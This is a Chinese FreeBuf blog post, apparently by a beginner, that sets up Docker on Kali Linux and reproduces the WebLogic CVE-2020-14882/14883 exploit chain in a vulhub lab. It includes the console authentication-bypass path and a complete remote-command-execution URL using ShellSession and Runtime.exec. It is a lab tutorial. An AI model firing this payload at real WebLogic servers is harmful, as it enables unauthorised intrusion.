freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

kali配置docker环境及利用vulhub复现cve-2020-14882
WY3507 2021-08-05 20:58:46 180129

前言

本人较菜,初入网安还在不断进步。都知道docker在搭建环境和靶场非常方便。本人原来喜欢用windows本机利用docker,感觉会方便些吧。因为需要在kali配置docker,于是在网上看过别的师傅文章但都会有些问题,于是我结合了几份文章所讲的方法配置了出来,就分享一下吧 也比较基础吧来说。本人菜,勿喷。还请多多指教!

操作步骤:

首先需要安装https协议 和CA证书 dirmngr

输入命令: apt-get update  将源镜像更新

1628168438_610be0f641a69cc54cd13.png!small

再输入命令:apt-get install -y apt-transport-https ca-certificates 安装CA证书和https协议

1628168446_610be0fe6f4e347fbb763.png!small

输入命令:apt-get install dirmngr

1628168455_610be107df1a760bb9d26.png!small

然后去添加GPG秘钥 和更新源

curl -fsSL https://download.docker.com/linux/debian/gpg| sudo apt-key add -   此命令为将镜像的GPG密钥下载下来并将此镜像加到镜像配置中去

1628168467_610be11393cf09c0936fb.png!small

输入命令:echo 'deb https://download.docker.com/linux/debianstretch stable'> /etc/apt/sources.list.d/docker.list  此命令是用正则表达式判断是否把镜像添加进去

1628168475_610be11b8302bf0cfb470.png!small

更新系统和安装docker

输入命令:apt-get update

1628168483_610be1231b271de2f093c.png!small

输入命令:apt-get install docker-ce

1628168489_610be12977ed98c231a72.png!small

当出现Y/N判断时 点击Y就可以了

启动docker服务器

输入命令: service docker start

安装compose

输入命令:apt insatll docker-compose

1628168502_610be13644658b4052772.png!small

当一切配置成功后

输入命令: docker run hello-world

1628168511_610be13f75606148de67c.png!small

最后结果要是这样 那就说明docker已经安装成功

查看版本

输入命令:docker version

1628168519_610be1477bd72929b0fe3.png!small

在配置好docker之后我们也拿它来复现一个历史漏洞吧 此漏洞为Weblogic任意文件上传 cve-2020-14882 cve-2020-14883 

CVE-2020-14882 是可以绕过登录,通过特定的路径直接进入后台,但是进去的权限较低,许多功能都用不了

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

受影响版本号:

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

首先先搭建环境 竟然配置好了docker,那就用docker配合vulhub搭建漏洞环境吧 vulhub是一个漏洞靶场(刚入门者讲解)

下载地址:git clone https://github.com/vulhub/vulhub.git

当然要是觉得下载慢 也可以先将安装包下载到本地电脑上 然后再将其拉入kali中 当然办法很多 看大家怎么下 了。

开始下载环境 进入vulhub中找到Weblogic文件中的cve-2020-14882

并输入启动命令:sudo docker-compose up -d

1628166508_610bd96cd2d5baec354c9.png!small

在环境下载成功后会在最后显示绿色的done 要是没有显示说明下载失败,就需要寻找原因了。

通过此POC可直接绕过:/console/css/%252e%252e%252fconsole.portal

1628168547_610be163288ceb152265c.png!small

但是此权限没有执行权限 则现在需要利用CEV-2020-14883漏洞来进行组合拳攻击了。

此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式是通过com.tangosol.coherence.mvel2.sh.ShellSession

可直接访问如下URL,即可利用`com.tangosol.coherence.mvel2.sh.ShellSession`执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

1628168559_610be16fb9b57c19c8038.png!small

之后会出现404页面错误 但是不影响

1628168567_610be177e374f4d679e07.png!small

可以去kali中weblogic 的目录容器中看看我们的success1 是否创建成功(截图丢失)

发现创建成功  漏洞复现成功

总结

整体文章浅显基础,也是结合大佬们的文章总结吧。很多文章可能会丢失一点关键的东西,操作就会很脑热,所以希望能对初学者有所帮助,大家一起学习。复现历史漏洞也相对简单,网上大佬们的复现很多也很精彩,POC&EXP以及复现工具也很多。但怎么说也是一种学习吧,打基础还是可以的哈哈!

# web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 WY3507 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
WY3507 LV.1
这家伙太懒了,还未填写个人描述!
  • 1 文章数
  • 0 关注者
文章目录